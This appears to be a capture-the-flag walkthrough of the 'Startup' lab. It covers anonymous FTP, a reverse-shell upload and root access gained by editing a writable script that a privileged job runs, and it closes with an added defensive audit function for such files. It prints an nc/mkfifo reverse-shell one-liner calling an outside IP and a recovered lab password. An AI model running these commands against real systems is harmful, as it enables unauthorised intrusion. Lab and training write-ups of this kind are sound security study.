some notes

Startup

Target IP: 10.10.80.45

I ran an nmap scan and got 3 open ports.

21/ftp, anonymous login allowed.
22/tcp open ssh
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))

Let's start by checking the ftp server. I connected to the ftp server and found 3 files there.

The ftp folder is empty.

There is nothing interesting in the .test.log file.

"Whoever is leaving these damn Among Us memes in this share, it IS NOT FUNNY. People downloading documents from our website will think we are a joke! Now I dont know who it is, but Maya is looking pretty sus."

This is the content of notice.txt. Who is Maya?

I ran binwalk on the image and it looks like there is something hidden.

Looks like an endless cycle... :(

Image metadata. Interestingly, the file extension is jpg, but the file type is png.

Strings - Nothing

Looks like we did not find any flags on the ftp server :(

Let's look at the site.

I am going to run gobuster to find out if there are any hidden folders.

gobuster dir -u http://$IP/ -w /usr/share/wordlists/dirb/common.txt

The files folder. Same content that we found on the ftp server.

If we can upload files to the ftp server and access them in the files folder, it is a good idea to upload a reverse shell there.

There is a problem. I cannot upload files. But, I can upload files to the ftp folder :)

Don't forget to run netcat.

nc -lvnp 4444

Hopefully it's gonna work. And, here we go. We've got the reverse shell.

Let's use this tool to make the shell a little bit better. https://ezprompt.net/

export PS1="\[\e[32m\]\u\[\e[m\]\[\e[32m\]@\[\e[m\]\[\e[32m\]\h\[\e[m\]\[\e[32m\][\[\e[m\]\[\e[32m\]\d\[\e[m\]\[\e[32m\]]\[\e[m\] "

That does not help, so I used ChatGPT and got this:

export PS1='\[\e[1;32m\]\u@\h:\[\e[1;34m\]\w\[\e[0m\]\$ '

Don't know why, but that does not work in this case. Forget about the shell. Let's look for the flags.

We have got the recipe and the secret ingredient.

We cannot go to root. :(

We need to escalate our privileges. We cannot go to any user's folder. But we found a user lennie. We can try to brute force his ssh password.

Looks like we can read /etc/passwd.

We found the .pcapng file in the incidents folder. Let's look at this file. Looks like someone already tried to hack this system.

Well, we have got some password: c4ntg3t3n0ughsp1c3

There you go! Now we can connect to the server via ssh.

btw, another way to make the shell pretty:

python -c "import pty;pty.spawn('/bin/bash')"

Interesting file: /etc/print.sh

We can try to change this file: /etc/vsftpd.conf

anon_root=/var/www/html/files

We can try to edit this file: /usr/share/doc/openssh-client/examples/sshd_config

We cannot edit any of these files.

linpeas.sh found this:

[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files
/etc/print.sh

Looking at planner.sh and reading the file, we can see that we can execute it but nothing else. We can also see that planner.sh executes print.sh, and we can edit the print.sh script. So let's go ahead and put a reverse shell into print.sh.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.2.38.40 1111 >/tmp/f

And here we go! We have the root reverse shell.

Now, we can go ahead and read the flag.
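
The root shell above came from a script run with higher privileges (planner.sh) calling a file that a lower-privileged user could edit (/etc/print.sh). As an added example, not part of the original notes, this defender-side check lists such files for any privileged script; the function names, the path-matching heuristic and the trusted-UID parameter are assumptions.

```shell
#!/bin/sh
# Added example (not from the original notes): flag files that a privileged
# script references but that someone other than the trusted owner could modify.

# check_one PATH UID: print a finding per problem; return 1 if any was found.
check_one() {
    rc=0
    # Owner differs from the trusted UID (numeric UIDs are accepted by -user).
    if [ -n "$(find -L "$1" -prune ! -user "$2" -print)" ]; then
        echo "OWNER-NOT-$2 $1"; rc=1
    fi
    # Group- or world-writable permission bits are set.
    if [ -n "$(find -L "$1" -prune \( -perm -020 -o -perm -002 \) -print)" ]; then
        echo "GROUP-OR-WORLD-WRITABLE $1"; rc=1
    fi
    return $rc
}

# audit_script_refs SCRIPT [TRUSTED_UID]: TRUSTED_UID defaults to 0 (root).
audit_script_refs() {
    script=$1
    trusted_uid=${2:-0}
    status=0
    # Heuristic (assumption): absolute paths are tokens that start with "/".
    # Comment lines, including the shebang, are skipped.
    refs=$(grep -v '^[[:space:]]*#' "$script" | grep -oE '/[A-Za-z0-9_./-]+' | sort -u)
    for ref in "$script" $refs; do
        [ -e "$ref" ] || continue
        # A writable parent directory allows the file to be replaced outright.
        for target in "$ref" "$(dirname "$ref")"; do
            check_one "$target" "$trusted_uid" || status=1
        done
    done
    return $status
}

# Example invocation (the notes do not give planner.sh's full path, so pass it):
#   audit_script_refs /path/to/planner.sh
```

Any line of output means the privileged script depends on something a less trusted account can change; the fix is root ownership and no group/world write bit on every file and directory in that chain.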